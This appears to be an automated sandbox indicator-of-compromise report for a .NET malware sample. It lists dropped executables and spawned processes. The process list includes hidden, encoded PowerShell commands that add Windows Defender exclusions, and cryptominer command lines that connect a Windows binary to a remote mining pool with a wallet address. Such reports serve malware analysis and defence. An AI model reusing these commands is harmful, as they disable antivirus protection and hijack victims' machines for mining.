IOC Report
e2kLb2J2Y7.exe

loading gif

Files

File Path
Type
Category
Malicious
e2kLb2J2Y7.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\xddtyli.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe:Zone.Identifier
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Key.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Values.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\e2kLb2J2Y7.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\xddtyli.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\zhtyxulkfny.exe.log
CSV text
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_142zoxi1.oib.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3cvdoh0g.iaz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4nvtqfku.ri2.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fwyl4it1.mvo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhtdv54i.3nm.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnvtic2h.ien.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pwhf1zdc.h5s.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rmh0k21e.rgz.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_slbckglv.hdn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_solqoxdo.avw.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tnpdzbff.jpy.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y3zy0y5e.cma.ps1
ASCII text, with no line terminators
dropped
There are 14 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\e2kLb2J2Y7.exe
C:\Users\user\Desktop\e2kLb2J2Y7.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
malicious
C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
C:\Users\user\AppData\Local\IsInvalid\koeogrk\Key.exe
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
malicious
C:\Users\user\AppData\Local\Temp\xddtyli.exe
C:\Users\user\AppData\Local\Temp\xddtyli.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcACoALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACAALQBGAG8AcgBjAGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlAA==
malicious
C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe
C:\Users\user\AppData\Roaming\RevisionNumber\Values.exe
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegAsm.exe
malicious
C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe
C:\Users\user\AppData\Local\Temp\zhtyxulkfny.exe
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o 163.123.142.171:8383 -u 44K2HL2woi2893k79NHDxhSdmL8vLcCcDX5HDn2F3d7fGrUkkCcQutFNXM5FtKq8SKUEjnCioyXVgNqSRMHUC9qX268CRGw.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=50
malicious